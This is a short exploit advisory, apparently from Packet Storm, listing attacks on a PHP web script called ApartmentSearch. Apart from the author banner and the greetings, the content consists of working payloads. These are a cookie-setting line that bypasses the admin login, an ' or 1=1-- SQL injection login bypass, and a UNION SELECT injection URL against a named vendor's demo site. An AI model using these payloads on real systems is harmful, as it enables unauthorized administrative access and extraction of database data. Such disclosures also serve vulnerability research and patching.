ApartmentSearch Insecure Cookie Handling / SQL Injection

2010-02-10T00:00:00
ID PACKETSTORM:86123
Type packetstorm
Reporter jiko
Modified 2010-02-10T00:00:00

Description

                                        
                                            ` |=-----------------------------------------------------=|  
|=-------------=[ JIKO |No-exploit.Com| ]=-----------=|  
|=-----------------------------------------------------=|  
[~]-----------|00|  
NAme :JIKO (JAWAD)  
Home :No-exploit.Com  
Mail : !x!  
[~]-----------|01|  
-{Script}  
name :ApartmentSearch  
link :http://www.ezonescripts.com/productdemos/ApartmentSearch/Site_Admin/admin.php  
  
[~]-----------|02|  
-{3xpl01t}  
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";  
USer:' or ' 1=1--  
pass:' or ' 1=1--  
http://www.ezonescripts.com/productdemos/ApartmentSearch/listtest.php?r=-1%20union%20select%200,user()--  
[~]-----------|03|  
-{Greetz}  
Cyber-Zone,HxH,Hussin X,sniper code,Stack,HiSoKa,The SadHacker  
|No-Exploit.com Members  
---------------------------------------------------------  
  
`